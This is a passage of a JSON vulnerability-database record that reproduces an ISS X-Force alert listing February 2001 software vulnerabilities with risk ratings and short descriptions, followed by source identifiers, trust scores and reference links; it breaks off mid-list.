2/14/01\nVulnerability: hp-text-editor-bo\nPlatforms Affected: HPUX\nRisk Factor: Medium\nAttack Type: Host Based\nBrief Description: HP Text editors buffer overflow\nX-Force URL: http://xforce.iss.net/static/6111.php\n\n_____\n\nDate Reported: 2/13/01\nVulnerability: sendtemp-pl-read-files\nPlatforms Affected: sendtemp.pl\nRisk Factor: Medium\nAttack Type: Network/Host Based\nBrief Description: sendtemp.pl could allow an attacker to read files on the server\nX-Force URL: http://xforce.iss.net/static/6104.php\n\n_____\n\nDate Reported: 2/13/01\nVulnerability: analog-alias-bo\nPlatforms Affected: Analog ALIAS\nRisk Factor: Medium\nAttack Type: Network/Host Based\nBrief Description: Analog ALIAS command buffer overflow\nX-Force URL: http://xforce.iss.net/static/6105.php\n\n_____\n\nDate Reported: 2/13/01\nVulnerability: elm-long-string-bo\nPlatforms Affected: Elm\nRisk Factor: Medium\nAttack Type: Host Based\nBrief Description: ELM -f command long string buffer overflow\nX-Force URL: http://xforce.iss.net/static/6151.php\n\n_____\n\nDate Reported: 2/13/01\nVulnerability: winnt-pptp-dos\nPlatforms Affected: Windows NT\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: Windows NT PPTP denial of service\nX-Force URL: http://xforce.iss.net/static/6103.php\n\n_____\n\nDate Reported: 2/12/01\nVulnerability: startinnfeed-format-string\nPlatforms Affected: Inn\nRisk Factor: High\nAttack Type: Host Based\nBrief Description: Inn \u0027startinnfeed\u0027 binary format string attack\nX-Force URL: http://xforce.iss.net/static/6099.php\n\n_____\n\nDate Reported: 2/12/01\nVulnerability: his-auktion-cgi-url\nPlatforms Affected: HIS Auktion\nRisk Factor: Medium\nAttack Type: Network/Host Based\nBrief Description: HIS Auktion CGI script could allow attackers to view unauthorized \n files or execute commands\nX-Force URL: http://xforce.iss.net/static/6090.php\n\n_____\n\nDate Reported: 2/12/01\nVulnerability: wayboard-cgi-view-files\nPlatforms Affected: Way-BOARD\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: Way-BOARD CGI could allow attackers to view unauthorized files\nX-Force URL: http://xforce.iss.net/static/6091.php\n\n_____\n\nDate Reported: 2/12/01\nVulnerability: muskat-empower-url-dir\nPlatforms Affected: Musket Empower\nRisk Factor: Low\nAttack Type: Network/Host Based\nBrief Description: Musket Empower could allow attackers to gain access to the DB directory path\nX-Force URL: http://xforce.iss.net/static/6093.php\n\n_____\n\nDate Reported: 2/12/01\nVulnerability: icq-icu-rtf-dos\nPlatforms Affected: LICQ\n Gnome ICU\nRisk Factor: Low\nAttack Type: Network/Host Based\nBrief Description: LICQ and Gnome ICU rtf file denial of service\nX-Force URL: http://xforce.iss.net/static/6096.php\n\n_____\n\nDate Reported: 2/12/01\nVulnerability: commerce-cgi-view-files\nPlatforms Affected: Commerce.cgi\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: Commerce.cgi could allow attackers to view unauthorized files\nX-Force URL: http://xforce.iss.net/static/6095.php\n\n_____\n\nDate Reported: 2/12/01\nVulnerability: roads-search-view-files\nPlatforms Affected: ROADS\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: ROADS could allow attackers to view unauthorized files using search.pl program\nX-Force URL: http://xforce.iss.net/static/6097.php\n\n_____\n\nDate Reported: 2/12/01\nVulnerability: webpage-cgi-view-info\nPlatforms Affected: WebPage.cgi\nRisk Factor: Low\nAttack Type: Network Based\nBrief Description: WebPage.cgi allows attackers to view sensitive information\nX-Force URL: http://xforce.iss.net/static/6100.php\n\n_____\n\nDate Reported: 2/12/01\nVulnerability: webspirs-cgi-view-files\nPlatforms Affected: WebSPIRS\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: WebSPIRS CGI could allow an attacker to view unauthorized files\nX-Force URL: http://xforce.iss.net/static/6101.php\n\n_____\n\nDate Reported: 2/12/01\nVulnerability: webpals-library-cgi-url\nPlatforms Affected: WebPALS\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: WebPALS Library System CGI script could allow attackers to view \n unauthorized files or execute commands\nX-Force URL: http://xforce.iss.net/static/6102.php\n\n_____\n\nDate Reported: 2/11/01\nVulnerability: cobol-apptrack-nolicense-permissions\nPlatforms Affected: MicroFocus Cobol\nRisk Factor: High\nAttack Type: Host Based\nBrief Description: MicroFocus Cobol with AppTrack enabled with nolicense permissions\nX-Force URL: http://xforce.iss.net/static/6092.php\n\n_____\n\nDate Reported: 2/11/01\nVulnerability: cobol-apptrack-nolicense-symlink\nPlatforms Affected: MicroFocus Cobol\nRisk Factor: High\nAttack Type: Host Based\nBrief Description: MicroFocus Cobol with AppTrack enabled allows symlink in nolicense\nX-Force URL: http://xforce.iss.net/static/6094.php\n\n_____\n\nDate Reported: 2/10/01\nVulnerability: vixie-crontab-bo\nPlatforms Affected: Vixie crontab\nRisk Factor: Medium\nAttack Type: Host Based\nBrief Description: Vixie crontab buffer overflow\nX-Force URL: http://xforce.iss.net/static/6098.php\n\n_____\n\nDate Reported: 2/10/01\nVulnerability: novell-groupwise-bypass-policies\nPlatforms Affected: Novell GroupWise\nRisk Factor: Medium\nAttack Type: Network/Host Based\nBrief Description: Novell Groupwise allows user to bypass policies and view files\nX-Force URL: http://xforce.iss.net/static/6089.php\n\n_____\n\nDate Reported: 2/9/01\nVulnerability: infobot-calc-gain-access\nPlatforms Affected: Infobot\nRisk Factor: High\nAttack Type: Network Based\nBrief Description: Infobot \u0027calc\u0027 command allows remote users to gain access\nX-Force URL: http://xforce.iss.net/static/6078.php\n\n_____\n\nDate Reported: 2/8/01\nVulnerability: linux-sysctl-read-memory\nPlatforms Affected: Linux\nRisk Factor: Medium\nAttack Type: Host Based\nBrief Description: Linux kernel sysctl() read memory\nX-Force URL: http://xforce.iss.net/static/6079.php\n\n_____\n\nDate Reported: 2/8/01\nVulnerability: openssh-bypass-authentication\nPlatforms Affected: OpenSSH\nRisk Factor: High\nAttack Type: Network/Host Based\nBrief Description: OpenSSH 2.3.1 allows remote users to bypass authentication\nX-Force URL: http://xforce.iss.net/static/6084.php\n\n_____\n\nDate Reported: 2/8/01\nVulnerability: lotus-notes-stored-forms\nPlatforms Affected: Lotus Notes\nRisk Factor: High\nAttack Type: Network/Host Based\nBrief Description: Lotus Notes stored forms\nX-Force URL: http://xforce.iss.net/static/6087.php\n\n_____\n\nDate Reported: 2/8/01\nVulnerability: linux-ptrace-modify-process\nPlatforms Affected: Linux\nRisk Factor: High\nAttack Type: Host Based\nBrief Description: Linux kernel ptrace modify process\nX-Force URL: http://xforce.iss.net/static/6080.php\n\n_____\n\nDate Reported: 2/8/01\nVulnerability: ssh-deattack-overwrite-memory\nPlatforms Affected: SSH\nRisk Factor: High\nAttack Type: Network/Host Based\nBrief Description: SSH protocol 1.5 deattack.c allows memory to be overwritten\nX-Force URL: http://xforce.iss.net/static/6083.php\n\n_____\n\nDate Reported: 2/7/01\nVulnerability: dc20ctrl-port-bo\nPlatforms Affected: FreeBSD\nRisk Factor: Medium\nAttack Type: Host Based\nBrief Description: FreeBSD dc20ctrl port buffer overflow\nX-Force URL: http://xforce.iss.net/static/6077.php\n\n_____\n\nDate Reported: 2/7/01\nVulnerability: ja-xklock-bo\nPlatforms Affected: FreeBSD\nRisk Factor: High\nAttack Type: Host Based\nBrief Description: ja-xklock buffer overflow\nX-Force URL: http://xforce.iss.net/static/6073.php\n\n_____\n\nDate Reported: 2/7/01\nVulnerability: ja-elvis-elvrec-bo\nPlatforms Affected: FreeBSD\nRisk Factor: High\nAttack Type: Host Based\nBrief Description: FreeBSD ja-elvis port buffer overflow\nX-Force URL: http://xforce.iss.net/static/6074.php\n\n_____\n\nDate Reported: 2/7/01\nVulnerability: ko-helvis-elvrec-bo\nPlatforms Affected: FreeBSD\nRisk Factor: High\nAttack Type: Host Based\nBrief Description: FreeBSD ko-helvis port buffer overflow\nX-Force URL: http://xforce.iss.net/static/6075.php\n\n_____\n\nDate Reported: 2/7/01\nVulnerability: serverworx-directory-traversal\nPlatforms Affected: ServerWorx\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: ServerWorx directory traversal\nX-Force URL: http://xforce.iss.net/static/6081.php\n\n_____\n\nDate Reported: 2/7/01\nVulnerability: ntlm-ssp-elevate-privileges\nPlatforms Affected: NTLM\nRisk Factor: High\nAttack Type: Host Based\nBrief Description: NTLM Security Support Provider could allow elevation of privileges\nX-Force URL: http://xforce.iss.net/static/6076.php\n\n_____\n\nDate Reported: 2/7/01\nVulnerability: ssh-session-key-recovery\nPlatforms Affected: SSH\nRisk Factor: High\nAttack Type: Network/Host Based\nBrief Description: SSH protocol 1.5 session key recovery\nX-Force URL: http://xforce.iss.net/static/6082.php\n\n_____\n\nDate Reported: 2/6/01\nVulnerability: aolserver-directory-traversal\nPlatforms Affected: AOLserver\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: AOLserver directory traversal\nX-Force URL: http://xforce.iss.net/static/6069.php\n\n_____\n\nDate Reported: 2/6/01\nVulnerability: chilisoft-asp-elevate-privileges\nPlatforms Affected: Chili!Soft\nRisk Factor: High\nAttack Type: Network/Host Based\nBrief Description: Chili!Soft ASP could allow elevated privileges\nX-Force URL: http://xforce.iss.net/static/6072.php\n\n_____\n\nDate Reported: 2/6/01\nVulnerability: win-udp-dos\nPlatforms Affected: Windows\nRisk Factor: Medium\nAttack Type: Network/Host Based\nBrief Description: Windows UDP socket denial of service\nX-Force URL: http://xforce.iss.net/static/6070.php\n\n_____\n\nDate Reported: 2/5/01\nVulnerability: ssh-daemon-failed-login\nPlatforms Affected: SSH\nRisk Factor: High\nAttack Type: Network/Host Based\nBrief Description: SSH daemon failed login attempts are not logged\nX-Force URL: http://xforce.iss.net/static/6071.php\n\n_____\n\nDate Reported: 2/5/01\nVulnerability: picserver-directory-traversal\nPlatforms Affected: PicServer\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: PicServer directory traversal\nX-Force URL: http://xforce.iss.net/static/6065.php\n\n_____\n\nDate Reported: 2/5/01\nVulnerability: biblioweb-directory-traversal\nPlatforms Affected: BiblioWeb\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: BiblioWeb Server directory traversal\nX-Force URL: http://xforce.iss.net/static/6066.php\n\n_____\n\nDate Reported: 2/5/01\nVulnerability: biblioweb-get-dos\nPlatforms Affected: BiblioWeb\nRisk Factor: Low\nAttack Type: Network Based\nBrief Description: BiblioWeb Server GET request denial of service\nX-Force URL: http://xforce.iss.net/static/6068.php\n\n_____\n\nDate Reported: 2/5/01\nVulnerability: ibm-netcommerce-reveal-information\nPlatforms Affected: IBM\nRisk Factor: Medium\nAttack Type: Network/Host Based\nBrief Description: IBM Net.Commerce could reveal sensitive information\nX-Force URL: http://xforce.iss.net/static/6067.php\n\n_____\n\nDate Reported: 2/5/01\nVulnerability: win-dde-elevate-privileges\nPlatforms Affected: Windows DDE\nRisk Factor: High\nAttack Type: Host Based\nBrief Description: Windows DDE can allow the elevation of privileges\nX-Force URL: http://xforce.iss.net/static/6062.php\n\n_____\n\nDate Reported: 2/4/01\nVulnerability: hsweb-directory-browsing\nPlatforms Affected: HSWeb\nRisk Factor: Low\nAttack Type: Network Based\nBrief Description: HSWeb Web Server allows attacker to browse directories\nX-Force URL: http://xforce.iss.net/static/6061.php\n\n_____\n\nDate Reported: 2/4/01\nVulnerability: sedum-directory-traversal\nPlatforms Affected: SEDUM\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: SEDUM HTTP Server directory traversal\nX-Force URL: http://xforce.iss.net/static/6063.php\n\n_____\n\nDate Reported: 2/4/01\nVulnerability: free-java-directory-traversal\nPlatforms Affected: Free Java\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: Free Java Web Server directory traversal\nX-Force URL: http://xforce.iss.net/static/6064.php\n\n_____\n\nDate Reported: 2/2/01\nVulnerability: goahead-directory-traversal\nPlatforms Affected: GoAhead\nRisk Factor: High\nAttack Type: Network Based\nBrief Description: GoAhead Web Server directory traversal\nX-Force URL: http://xforce.iss.net/static/6046.php\n\n_____\n\nDate Reported: 2/2/01\nVulnerability: gnuserv-tcp-cookie-overflow\nPlatforms Affected: Gnuserv\nRisk Factor: High\nAttack Type: Network/Host Based\nBrief Description: Gnuserv TCP enabled cookie buffer overflow\nX-Force URL: http://xforce.iss.net/static/6056.php\n\n_____\n\nDate Reported: 2/2/01\nVulnerability: xmail-ctrlserver-bo\nPlatforms Affected: Xmail CTRLServer\nRisk Factor: High\nAttack Type: Network Based\nBrief Description: XMail CTRLServer buffer overflow\nX-Force URL: http://xforce.iss.net/static/6060.php\n\n_____\n\nDate Reported: 2/2/01\nVulnerability: netscape-webpublisher-acl-permissions\nPlatforms Affected: Netscape Web Publisher\nRisk Factor: Medium\nAttack Type: Network Based\nBrief Description: Netcape Web Publisher poor ACL permissions\nX-Force URL: http://xforce.iss.net/static/6058.php\n\n_____\n\nDate Reported: 2/1/01\nVulnerability: cups-httpgets-dos\nPlatforms Affected: CUPS\nRisk Factor: High\nAttack Type: Host Based\nBrief Description: CUPS httpGets() function denial of service\nX-Force URL: http://xforce.iss.net/static/6043.php\n\n_____\n\nDate Reported: 2/1/01\nVulnerability: prospero-get-pin\nPlatforms Affected: Prospero\nRisk Factor: High\nAttack Type: Network/Host Based\nBrief Description: Prospero GET request reveals PIN information\nX-Force URL: http://xforce.iss.net/static/6044.php\n\n_____\n\nDate Reported: 2/1/01\nVulnerability: prospero-weak-permissions\nPlatforms Affected: Prospero\nRisk Factor: High\nAttack Type: Network/Host Based\nBrief Description: Prospero uses weak permissions\nX-Force URL: http://xforce.iss.net/static/6045.php\n\n_____\n\nRisk Factor Key:\n\n High Any vulnerability that provides an attacker with immediate\n access into a machine, gains superuser access, or bypasses\n a firewall. Example: A vulnerable Sendmail 8.6.5 version\n that allows an intruder to execute commands on mail\n server. \n Medium Any vulnerability that provides information that has a\n high potential of giving system access to an intruder. \n Example: A misconfigured TFTP or vulnerable NIS server\n that allows an intruder to get the password file that\n could contain an account with a guessable password. \n Low Any vulnerability that provides information that\n potentially could lead to a compromise. Example: A\n finger that allows an intruder to find out who is online\n and potential accounts to attempt to crack passwords\n via brute force methods. \n\n________\n\n\nISS is a leading global provider of security management solutions for\ne-business. By offering best-of-breed SAFEsuite(tm) security software,\ncomprehensive ePatrol(tm) monitoring services and industry-leading\nexpertise, ISS serves as its customers\u0027 trusted security provider\nprotecting digital assets and ensuring the availability, confidentiality and\nintegrity of computer systems and information critical to e-business\nsuccess. ISS\u0027 security management solutions protect more than 5,000\ncustomers including 21 of the 25 largest U.S. commercial banks, 9 of the 10\nlargest telecommunications companies and over 35 government agencies. \nFounded in 1994, ISS is headquartered in Atlanta, GA, with additional\noffices throughout North America and international operations in Asia,\nAustralia, Europe and Latin America. For more information, visit the ISS Web\nsite at www.iss.net or call 800-776-2362. \n\nCopyright (c) 2001 by Internet Security Systems, Inc. \n\nPermission is hereby granted for the redistribution of this Alert\nelectronically. It is not to be edited in any way without express consent\nof the X-Force. If you wish to reprint the whole or any part of this Alert\nin any other medium excluding electronic medium, please e-mail\nxforce@iss.net for permission. \n\nDisclaimer\n\nThe information within this paper may change without notice. Use of this\ninformation constitutes acceptance for use in an AS IS condition. There are\nNO warranties with regard to this information. In no event shall the author\nbe liable for any damages whatsoever arising out of or in connection with\nthe use or spread of this information. Any use of this information is at the\nuser\u0027s own risk. \n\n\n\nX-Force PGP Key available at: http://xforce.iss.net/sensitive.php as \nwell as on MIT\u0027s PGP key server and PGP.com\u0027s key server. \n\nPlease send suggestions, updates, and comments to: X-Force xforce@iss.net\nof Internet Security Systems, Inc. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: 2.6.3a\nCharset: noconv\n\niQCVAwUBOqb8ojRfJiV99eG9AQGEaAP+KH+SQYNBsbUcv/mUJNUz7dDPIYVcmPNV\n1xyO/ctnG6qScWnlXGltYS7Rj8T8tYAAZC77oDhFSvvs8CX1Dr32ImEyvOIJhMLA\nh0wKCV3HOAYJ662BASe3jbO3nL/bumNKCRL5heuIU85pQOuH9xbqXkmFEimDmG2B\ntT+ylKw4hn4=\n=kfHg\n-----END PGP SIGNATURE-----\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2001-0361"
},
{
"db": "CERT/CC",
"id": "VU#161576"
},
{
"db": "CERT/CC",
"id": "VU#290140"
},
{
"db": "CERT/CC",
"id": "VU#13877"
},
{
"db": "CERT/CC",
"id": "VU#25309"
},
{
"db": "CERT/CC",
"id": "VU#945216"
},
{
"db": "CERT/CC",
"id": "VU#566640"
},
{
"db": "CERT/CC",
"id": "VU#651994"
},
{
"db": "CERT/CC",
"id": "VU#315308"
},
{
"db": "BID",
"id": "2347"
},
{
"db": "BID",
"id": "2344"
},
{
"db": "BID",
"id": "5114"
},
{
"db": "BID",
"id": "2405"
},
{
"db": "PACKETSTORM",
"id": "24431"
}
],
"trust": 7.83
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#13877",
"trust": 3.2
},
{
"db": "BID",
"id": "2344",
"trust": 2.7
},
{
"db": "CERT/CC",
"id": "VU#945216",
"trust": 2.4
},
{
"db": "CERT/CC",
"id": "VU#25309",
"trust": 2.4
},
{
"db": "OSVDB",
"id": "2116",
"trust": 1.6
},
{
"db": "NVD",
"id": "CVE-2001-0361",
"trust": 1.6
},
{
"db": "BID",
"id": "5114",
"trust": 1.1
},
{
"db": "BID",
"id": "2347",
"trust": 1.1
},
{
"db": "BID",
"id": "2405",
"trust": 1.1
},
{
"db": "XF",
"id": "6083",
"trust": 0.9
},
{
"db": "XF",
"id": "6135",
"trust": 0.9
},
{
"db": "XF",
"id": "6063",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#161576",
"trust": 0.8
},
{
"db": "CERT/CC",
"id": "VU#290140",
"trust": 0.8
},
{
"db": "XF",
"id": "6449",
"trust": 0.8
},
{
"db": "CERT/CC",
"id": "VU#566640",
"trust": 0.8
},
{
"db": "BID",
"id": "2335",
"trust": 0.8
},
{
"db": "CERT/CC",
"id": "VU#651994",
"trust": 0.8
},
{
"db": "XF",
"id": "6472",
"trust": 0.8
},
{
"db": "CERT/CC",
"id": "VU#315308",
"trust": 0.8
},
{
"db": "XF",
"id": "6082",
"trust": 0.7
},
{
"db": "DEBIAN",
"id": "DSA-027",
"trust": 0.6
},
{
"db": "DEBIAN",
"id": "DSA-023",
"trust": 0.6
},
{
"db": "DEBIAN",
"id": "DSA-086",
"trust": 0.6
},
{
"db": "SUSE",
"id": "SUSE-SA:2001:04",
"trust": 0.6
},
{
"db": "FREEBSD",
"id": "FREEBSD-SA-01:24",
"trust": 0.6
},
{
"db": "CIAC",
"id": "L-047",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20010207 [CORE SDI ADVISORY] SSH1 SESSION KEY RECOVERY VULNERABILITY",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200106-182",
"trust": 0.6
},
{
"db": "XF",
"id": "6115",
"trust": 0.1
},
{
"db": "XF",
"id": "6075",
"trust": 0.1
},
{
"db": "XF",
"id": "6149",
"trust": 0.1
},
{
"db": "XF",
"id": "6145",
"trust": 0.1
},
{
"db": "XF",
"id": "6136",
"trust": 0.1
},
{
"db": "XF",
"id": "6065",
"trust": 0.1
},
{
"db": "XF",
"id": "6157",
"trust": 0.1
},
{
"db": "XF",
"id": "6058",
"trust": 0.1
},
{
"db": "XF",
"id": "6161",
"trust": 0.1
},
{
"db": "XF",
"id": "6109",
"trust": 0.1
},
{
"db": "XF",
"id": "6121",
"trust": 0.1
},
{
"db": "XF",
"id": "6062",
"trust": 0.1
},
{
"db": "XF",
"id": "6137",
"trust": 0.1
},
{
"db": "XF",
"id": "6101",
"trust": 0.1
},
{
"db": "XF",
"id": "6089",
"trust": 0.1
},
{
"db": "XF",
"id": "6072",
"trust": 0.1
},
{
"db": "XF",
"id": "6143",
"trust": 0.1
},
{
"db": "XF",
"id": "6084",
"trust": 0.1
},
{
"db": "XF",
"id": "6100",
"trust": 0.1
},
{
"db": "XF",
"id": "6080",
"trust": 0.1
},
{
"db": "XF",
"id": "6071",
"trust": 0.1
},
{
"db": "XF",
"id": "6073",
"trust": 0.1
},
{
"db": "XF",
"id": "6116",
"trust": 0.1
},
{
"db": "XF",
"id": "6144",
"trust": 0.1
},
{
"db": "XF",
"id": "6104",
"trust": 0.1
},
{
"db": "XF",
"id": "6094",
"trust": 0.1
},
{
"db": "XF",
"id": "6087",
"trust": 0.1
},
{
"db": "XF",
"id": "6090",
"trust": 0.1
},
{
"db": "XF",
"id": "6046",
"trust": 0.1
},
{
"db": "XF",
"id": "6056",
"trust": 0.1
},
{
"db": "XF",
"id": "6060",
"trust": 0.1
},
{
"db": "XF",
"id": "6130",
"trust": 0.1
},
{
"db": "XF",
"id": "6092",
"trust": 0.1
},
{
"db": "XF",
"id": "6118",
"trust": 0.1
},
{
"db": "XF",
"id": "6117",
"trust": 0.1
},
{
"db": "XF",
"id": "6098",
"trust": 0.1
},
{
"db": "XF",
"id": "6156",
"trust": 0.1
},
{
"db": "XF",
"id": "6113",
"trust": 0.1
},
{
"db": "XF",
"id": "6067",
"trust": 0.1
},
{
"db": "XF",
"id": "6064",
"trust": 0.1
},
{
"db": "XF",
"id": "6045",
"trust": 0.1
},
{
"db": "XF",
"id": "6147",
"trust": 0.1
},
{
"db": "XF",
"id": "6095",
"trust": 0.1
},
{
"db": "XF",
"id": "6131",
"trust": 0.1
},
{
"db": "XF",
"id": "6114",
"trust": 0.1
},
{
"db": "XF",
"id": "6134",
"trust": 0.1
},
{
"db": "XF",
"id": "6074",
"trust": 0.1
},
{
"db": "XF",
"id": "6044",
"trust": 0.1
},
{
"db": "XF",
"id": "6112",
"trust": 0.1
},
{
"db": "XF",
"id": "6077",
"trust": 0.1
},
{
"db": "XF",
"id": "6148",
"trust": 0.1
},
{
"db": "XF",
"id": "6146",
"trust": 0.1
},
{
"db": "XF",
"id": "6078",
"trust": 0.1
},
{
"db": "XF",
"id": "6110",
"trust": 0.1
},
{
"db": "XF",
"id": "6132",
"trust": 0.1
},
{
"db": "XF",
"id": "6099",
"trust": 0.1
},
{
"db": "XF",
"id": "6079",
"trust": 0.1
},
{
"db": "XF",
"id": "6102",
"trust": 0.1
},
{
"db": "XF",
"id": "6096",
"trust": 0.1
},
{
"db": "XF",
"id": "6142",
"trust": 0.1
},
{
"db": "XF",
"id": "6091",
"trust": 0.1
},
{
"db": "XF",
"id": "6158",
"trust": 0.1
},
{
"db": "XF",
"id": "6162",
"trust": 0.1
},
{
"db": "XF",
"id": "6163",
"trust": 0.1
},
{
"db": "XF",
"id": "6155",
"trust": 0.1
},
{
"db": "XF",
"id": "6081",
"trust": 0.1
},
{
"db": "XF",
"id": "6160",
"trust": 0.1
},
{
"db": "XF",
"id": "6111",
"trust": 0.1
},
{
"db": "XF",
"id": "6152",
"trust": 0.1
},
{
"db": "XF",
"id": "6068",
"trust": 0.1
},
{
"db": "XF",
"id": "6043",
"trust": 0.1
},
{
"db": "XF",
"id": "6076",
"trust": 0.1
},
{
"db": "XF",
"id": "6103",
"trust": 0.1
},
{
"db": "XF",
"id": "6070",
"trust": 0.1
},
{
"db": "XF",
"id": "6133",
"trust": 0.1
},
{
"db": "XF",
"id": "6153",
"trust": 0.1
},
{
"db": "XF",
"id": "6124",
"trust": 0.1
},
{
"db": "XF",
"id": "6061",
"trust": 0.1
},
{
"db": "XF",
"id": "6066",
"trust": 0.1
},
{
"db": "XF",
"id": "6097",
"trust": 0.1
},
{
"db": "XF",
"id": "6105",
"trust": 0.1
},
{
"db": "XF",
"id": "6159",
"trust": 0.1
},
{
"db": "XF",
"id": "6069",
"trust": 0.1
},
{
"db": "XF",
"id": "6093",
"trust": 0.1
},
{
"db": "XF",
"id": "6139",
"trust": 0.1
},
{
"db": "XF",
"id": "6151",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "24431",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#161576"
},
{
"db": "CERT/CC",
"id": "VU#290140"
},
{
"db": "CERT/CC",
"id": "VU#13877"
},
{
"db": "CERT/CC",
"id": "VU#25309"
},
{
"db": "CERT/CC",
"id": "VU#945216"
},
{
"db": "CERT/CC",
"id": "VU#566640"
},
{
"db": "CERT/CC",
"id": "VU#651994"
},
{
"db": "CERT/CC",
"id": "VU#315308"
},
{
"db": "BID",
"id": "2347"
},
{
"db": "BID",
"id": "2344"
},
{
"db": "BID",
"id": "5114"
},
{
"db": "BID",
"id": "2405"
},
{
"db": "PACKETSTORM",
"id": "24431"
},
{
"db": "CNNVD",
"id": "CNNVD-200106-182"
},
{
"db": "NVD",
"id": "CVE-2001-0361"
}
]
},
"id": "VAR-200106-0080",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.86113698
},
"last_update_date": "2024-07-23T19:26:39.063000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-310",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2001-0361"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://www.securityfocus.com/bid/2344"
},
{
"trust": 2.4,
"url": "http://www.kb.cert.org/vuls/id/13877"
},
{
"trust": 2.4,
"url": "http://www.ssh.com/products/ssh/cert/"
},
{
"trust": 1.6,
"url": "http://www.cert.org/advisories/ca-2001-35.html"
},
{
"trust": 1.6,
"url": "http://www.kb.cert.org/vuls/id/945216"
},
{
"trust": 1.6,
"url": "http://www.kb.cert.org/vuls/id/25309"
},
{
"trust": 1.6,
"url": "http://www.osvdb.org/2116"
},
{
"trust": 1.6,
"url": "http://www.novell.com/linux/security/advisories/adv004_ssh.html"
},
{
"trust": 1.6,
"url": "http://www.debian.org/security/2001/dsa-086"
},
{
"trust": 1.6,
"url": "http://www.debian.org/security/2001/dsa-027"
},
{
"trust": 1.6,
"url": "http://www.debian.org/security/2001/dsa-023"
},
{
"trust": 1.6,
"url": "http://www.ciac.org/ciac/bulletins/l-047.shtml"
},
{
"trust": 1.6,
"url": "ftp://ftp.freebsd.org/pub/freebsd/cert/advisories/freebsd-sa-01:24.ssh.asc"
},
{
"trust": 1.4,
"url": "http://www.cisco.com/warp/public/707/ssh-multiple-pub.html"
},
{
"trust": 1.1,
"url": "http://www.cisco.com/warp/public/707/ssh-scanning.shtml"
},
{
"trust": 1.0,
"url": "http://marc.info/?l=bugtraq\u0026m=98158450021686\u0026w=2"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/6082"
},
{
"trust": 0.9,
"url": "http://xforce.iss.net/static/6083.php"
},
{
"trust": 0.9,
"url": "http://xforce.iss.net/static/6135.php"
},
{
"trust": 0.9,
"url": "http://xforce.iss.net/static/6063.php"
},
{
"trust": 0.8,
"url": "http://securityportal.com/articles/magicnumbers20010227.html"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/5114"
},
{
"trust": 0.8,
"url": "http://www.corest.com/files/files/11/crc32.pdf"
},
{
"trust": 0.8,
"url": "http://www1.corest.com/common/showdoc.php?idx=131\u0026idxseccion=10"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/static/6449.php"
},
{
"trust": 0.8,
"url": "http://razor.bindview.com/publish/advisories/adv_ssh1crc.html"
},
{
"trust": 0.8,
"url": "http://www1.corest.com/common/showdoc.php?idx=81\u0026idxsection=10#"
},
{
"trust": 0.8,
"url": "http://www.openssh.com/security.html"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/2347"
},
{
"trust": 0.8,
"url": "http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/alerts/advise100.php"
},
{
"trust": 0.8,
"url": "http://www.cryptnet.net/fcp/audit/pgp4pine/01.html"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/2405"
},
{
"trust": 0.8,
"url": "http://devrandom.net/lists/archives/2001/2/bugtraq/0383.html"
},
{
"trust": 0.8,
"url": "http://security-archive.merton.ox.ac.uk/bugtraq-200102/0389.html"
},
{
"trust": 0.8,
"url": "http://pgp4pine.flatline.de/"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/2335"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/archive/1/160452"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/static/6472.php"
},
{
"trust": 0.7,
"url": "http://xforce.iss.net/static/6082.php"
},
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=98158450021686\u0026w=2"
},
{
"trust": 0.3,
"url": "http://www.netscreen.com/index.html"
},
{
"trust": 0.3,
"url": "http://www.netscreen.com/support/alerts/11_06_02.html"
},
{
"trust": 0.3,
"url": "http://support.coresecurity.com/impact/exploits/56f46f9564b53fc1bca5bef469b60df7.html"
},
{
"trust": 0.3,
"url": "/archive/1/298289"
},
{
